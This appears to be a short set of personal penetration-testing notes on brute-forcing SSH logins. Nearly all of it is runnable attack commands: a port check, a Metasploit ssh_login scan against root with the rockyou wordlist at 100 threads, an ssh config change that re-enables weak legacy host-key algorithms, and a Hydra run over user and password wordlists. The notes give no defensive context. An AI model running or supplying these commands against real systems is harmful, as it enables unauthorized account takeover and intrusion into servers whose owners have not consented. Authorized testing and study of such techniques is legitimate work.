assuming password-based auth for once - see brute-ssh-known-privkey if you found some keys
target=x.x.x.x ping -c1 $target nmap -p 22 $target
ideally you got a user name or user DB target. this is just example against root
use auxiliary/scanner/ssh/ssh_login show options set RHOSTS x.x.x.x set STOP_ON_SUCCESS true set THREADS 100 set USERNAME root set PASS_FILE /var/tmp/rockyou.txt run
check that ssh client is able to negociate with server
ssh $target -l admin ^C
eventually fix-up things
vi ~/.ssh/config
host x.x.x*
hostkeyalgorithms +ssh-rsa
hostkeyalgorithms +ssh-dss
and proceed
userlist=/usr/share/wordlists/ssh-users.txt
passwordlist=/usr/share/wordlists/ssh-passwords.txt
passwordlist=/usr/share/wordlists/russkiwlst_top_100k.lst
sudo apt install hydra
grep ^proc /proc/cpuinfo
time hydra -4f -e nsr -t 8 \
-L $userlist -P $passwordlist ssh://$target
# -V
and if you know some specific login or password
# -l LOGIN # -p PASSWORD